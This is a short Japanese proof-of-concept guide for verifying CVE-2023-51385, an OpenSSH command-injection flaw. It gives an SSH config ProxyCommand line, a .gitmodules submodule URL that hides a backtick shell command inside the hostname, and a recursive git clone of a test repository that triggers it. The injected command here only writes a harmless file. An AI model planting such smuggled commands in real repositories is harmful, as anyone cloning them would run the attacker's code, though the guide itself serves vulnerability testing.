
CVE-2023-51385 に対する検証
まず、~/.ssh/configに以下の内容を追加する必要があります
host *.example.com
ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p
.gitmodulesファイルの記述にはコマンドインジェクションが存在します
url = ssh://`echo helloworld > cve.txt`foo.example.com/bar
設定が完了したら、以下のコマンドを実行してトリガーします
git clone https://github.com/LtmThink/CVE-2023-51385_test --recurse-submodules
実行に成功すると、CVE-2023-51385_testディレクトリにcve.txtファイルが生成されます

注意:OpenSSHは<9.6p1である必要があります
詳細情報はこちらのブログを参照してください: